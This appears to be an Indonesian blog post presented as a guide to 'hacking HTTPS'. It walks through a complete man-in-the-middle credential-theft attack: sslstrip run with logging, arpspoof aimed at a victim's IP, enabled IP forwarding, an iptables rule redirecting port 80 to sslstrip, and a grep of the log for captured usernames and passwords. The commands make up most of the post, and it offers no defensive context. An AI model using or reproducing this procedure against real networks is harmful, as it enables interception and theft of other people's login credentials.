Disini Saya akan menjelaskan bagaimana cara menghack HTTPS.
Ok langsung aja kita masuk ke TKP :
1. Contoh aja :
attacker : 172.192.30.30
victim : 172.192.30.40
gateway : 172.192.30.254
2. command : sslstrip
manual options:
-w , –write= Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l , –listen= Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message
3 . execute :
root@spyro:~# sslstrip -a -w logfilename
4. execute arpspoof of the victim :
root@spyro:~# arpspoof -i vmnet1 -t 172.192.30.40 172.192.30.254
5. activate a ip_forward function :
root@spyro:~# echo 1 > /proc/sys/net/ipv4/ip_forward
6. redirect http port victim communication to sslstrip port
root@spyro:~# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000
ketika victim melakukan login ke port https, maka username n passwordnya akan tercatat di log file dump yang kita buat (dalam artikel ini nama filenya “logfilename”)
7. view a dump log file :
root@spyro:~# cat logfilename | grep -i “passwd=”
lihat dan cari kata kunci “login=” dan “passwd=”
ex : login=Boiem & passwd=Hacking
Semoga Bermanfaat..
.:|:. Jangan Lupa Tinggalkan Komentar Anda .:|:.
0 komentar:
Posting Komentar